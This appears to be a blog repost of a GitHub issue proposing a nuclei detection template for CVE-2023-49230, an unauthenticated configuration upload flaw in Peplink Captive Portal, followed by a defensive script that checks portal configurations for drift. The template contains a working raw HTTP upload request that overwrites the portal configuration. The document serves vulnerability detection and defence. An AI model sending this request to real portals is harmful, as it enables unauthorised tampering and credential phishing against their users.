Peplink Captive Portal Unauthenticated Config Upload Vulnerability

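Vulnerability information

Vulnerability name: Peplink Captive Portal Unauthenticated Config Upload Vulnerability

Vulnerability ID:

  • CVE: CVE-2023-49230

Vulnerability type: File upload

Severity: High

Vulnerability description:

Affected product

Peplink Captive Portal is a network portal solution provided by Peplink, widely used for Wi-Fi access control in enterprises, hotels, airports and other public venues. It lets network administrators manage user access through a portal page, including authentication and acceptance of terms. Because it is widely deployed, the impact scope of this vulnerability is large.

Vulnerability details

This is an unauthorized file upload vulnerability in the /guest/portal_admin_upload.cgi endpoint. Without authenticating, an attacker can upload a malicious configuration file by sending a crafted HTTP request. The effect of the uploaded configuration can be viewed through the /guest/preview.cgi?portal_id=1 endpoint. The root cause is the lack of proper authentication and input validation on the upload operation, which lets an attacker bypass security restrictions and upload arbitrary configuration.

Impact analysis

This vulnerability lets an attacker upload a malicious configuration without authorization, which can lead to several security risks, including but not limited to: modifying the portal page content and injecting malicious scripts or links to carry out phishing; tampering with the user login flow to steal user credentials; and possibly, through further exploitation, server-side code execution. Because exploitation requires no authentication, the barrier to attack is low and the flaw can be exploited at scale by automated tools, posing a serious threat to affected systems.

Vendor: Peplink

Product name: Peplink Captive Portal

Source: https://github.com/projectdiscovery/nuclei-templates/issues/12195

Type: projectdiscovery/nuclei-templates:github issues

Source summary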

Is there an existing template for this?

  • I have searched the existing templates.

Nuclei Template

```yaml
id: cve-2023-49230

info:
  name: Peplink Captive Portal Unauthenticated Config Upload
  author: srilakivarma
  severity: high
  description: |
    Unauthenticated upload to /guest/portal_admin_upload.cgi with effect visible at /guest/preview.cgi?portal_id=1.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2023-49230
  tags: cve, peplink, upload, unauth

http:
  # Step 1: Upload configuration
  - raw:
      - |
        POST /guest/portal_admin_upload.cgi HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=---------------------------370611892836891531633729116268

        -----------------------------370611892836891531633729116268
        Content-Disposition: form-data; name="option"

        edit_page
        -----------------------------370611892836891531633729116268
        Content-Disposition: form-data; name="mode"

        submit
        -----------------------------370611892836891531633729116268
        Content-Disposition: form-data; name="portal_id"

        1
        -----------------------------370611892836891531633729116268
        Content-Disposition: form-data; name="data"

        {"status":"ok","config":{"login":{"access_mode":"open","message":"","tnc_content":"Terms and Conditions.","tnc_title":"Terms and Conditions","tnc_link":"terms","tnc_prompt":"I agree to #TNC_LINK#","back_login_button":"Back to Login","agree_button":"Injected","session_id1":" ","session_id2":" "},"common":{"hide_quota":"no","landing_url":"","logo_url":"logo.cgi?portal_id=1&type=preview","logo_url_def":"logo.cgi?default=1","uploaded_logo_size":0,"footer":"Powered by Peplink.","footer_default":"Powered by Peplink."},"success":{},"reach_quota":{},"quota":{"limit":{"data":0,"session_timeout":1800}}}}
        -----------------------------370611892836891531633729116268
        Content-Disposition: form-data; name="logo_action"

        x
        -----------------------------370611892836891531633729116268
        Content-Disposition: form-data; name="logo"; filename=""
        Content-Type: application/octet-stream

        -----------------------------370611892836891531633729116268--

    matchers:
      - type: word
        part: body
        words:
          - '"status": "save_success"'
```
Relevant dumped responses

[cve-2023-49230:word-1] [http] [high] https://redact.com/guest/portal_admin_upload.cgi

Anything else?

https://www.tenable.com/cve/CVE-2023-49230
https://www.synacktiv.com/sites/default/files/2023-12/synacktiv-peplink-multiple-vulnerabilities.pdf
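
A defender-side check for the configuration tampering described above, as an added example that is not part of the original issue or its nuclei template: it diffs a portal configuration against a known-good baseline and flags drifted text fields that carry links or markup. The function names, the assumption that the configuration is available as exported JSON, and both sample documents are constructed for illustration; only the field names and the "Injected" value come from the template's data field.

```python
import json
import re

# Links or HTML markup inside a text field that differs from the baseline.
SUSPICIOUS = re.compile(r"<\s*/?\s*[a-z]|javascript:|https?://", re.IGNORECASE)

# Constructed samples; field names follow the template's "data" JSON.
BASELINE = json.dumps({"status": "ok", "config": {
    "login": {"access_mode": "open", "agree_button": "Agree"},
    "common": {"landing_url": "", "footer": "Powered by Peplink."},
    "quota": {"limit": {"data": 0, "session_timeout": 1800}}}})
OBSERVED = json.dumps({"status": "ok", "config": {
    "login": {"access_mode": "open", "agree_button": "Injected"},
    "common": {"landing_url": "http://portal.example.invalid/",
               "footer": "Powered by <b>Peplink</b>."},
    "quota": {"limit": {"data": 0, "session_timeout": 1800}}}})


def flatten(node, prefix=""):
    """Yield (dotted_path, value) for every leaf of a nested dict."""
    if isinstance(node, dict):
        for key, value in node.items():
            yield from flatten(value, f"{prefix}{key}.")
    else:
        yield prefix.rstrip("."), node


def audit_portal_config(baseline_json, observed_json):
    """Return (path, kind, baseline_value, observed_value) per drifted leaf."""
    base = dict(flatten(json.loads(baseline_json).get("config", {})))
    seen = dict(flatten(json.loads(observed_json).get("config", {})))
    findings = []
    for path in sorted(base.keys() | seen.keys()):
        old, new = base.get(path), seen.get(path)
        if old == new and (path in base) == (path in seen):
            continue
        kind = "added" if path not in base else "removed" if path not in seen else "changed"
        if isinstance(new, str) and SUSPICIOUS.search(new):
            kind += "+link-or-markup"
        findings.append((path, kind, old, new))
    return findings


if __name__ == "__main__":
    for finding in audit_portal_config(BASELINE, OBSERVED):
        print(*finding, sep=" | ")
```

Run on a schedule against each portal's exported configuration, any non-empty result is a prompt to check who changed the portal and when.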


http://example.com/2025/07/06/github_1644031419/
Author
lianccc
Published
July 6, 2025
License